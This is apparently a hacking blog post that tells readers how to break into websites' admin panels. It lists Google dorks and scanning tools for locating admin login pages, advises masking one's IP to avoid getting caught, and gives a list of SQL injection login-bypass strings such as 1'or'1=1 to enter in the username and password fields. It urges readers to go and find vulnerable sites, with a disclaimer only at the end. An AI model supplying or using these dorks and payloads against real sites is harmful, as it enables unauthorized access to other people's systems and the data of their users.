For hacking into websites,the most common approach is finding the admin page of that website and then somehow get into the admin panel.So here in this post,i will be discussing the methods to find the admin page of a website and telling you how to get into admin panel of sites....
Method 1-Using Google Dorks-
Use the following Google dorks to find the admin page of a website-
inurl:admin.asp
inurl:admin.php
intitle:admin
intitle:admin login
intitle:administrator
inurl:adminlogin.asp
inurl:adminlogin.php
inurl:administrator
For example,if you want to find the admin page for http://target.com/ ,
Just go to Google,and search(without quotes) "site:target.com intitle:admin" or "site:target.com inurl:admin" or you can try any other combination .
You can even use a combination of three or more dorks in the search query to get the results.
In this way we can reach to the admin page of a website with help of Google .
Method 2- Using Software's-
Here,we will be using a software "Reiluke's Admin Finder",Its quiet simple to use,just enter the website whose Admin you need to find and click "Scan".It will provide you the Admin link in sometime depending on Net Speed.
There is another software named "Havij" and that can also be used for the same-
After you have found the admin page of a website,next is hacking into the Admin Panel of the
website.Now before doing so...do not forget to mask your identity.So that you dont get caught.
Refer this post for hiding your IP Address-
Now after you have spoofed your IP,we proceed to the hacking part-
We require a username and a password to login as admin.
A lot of website suffer the SQL Injection Vulnerability.Now I will be discussing SQL injection later in detail,and telling you how to penetrate into a database using SQL injection.
For now,if the website is vulnerable to sql injection,we can get into the admin panel.You have to just enter a string in Username & Password and we can get into the admin panel.
Just enter this String in both username & Password 1'or'1=1 Then click Login and you could reach the admin control panel of the Website :)
There are other SQL Strings as well-
' or 1=1--
" or 1=1--
or 1=1--
" or 1=1--
or 1=1--
') or ('a' = 'a
') or ('1'-'1
'or''='
' or'1=1
But 1'or'1=1 works most of the time so must be always tried first.
The concept of these SQL Strings and there working will be discussed by me later...so plz wait for my next post on SQL Injection . Till then try this and find sites which are vulnerable to this,Trust me....there are many sites still vulnerable to this attack...
This post is meant only for educational purpose,any misuse of the above information shall not be the responsibility of publisher.......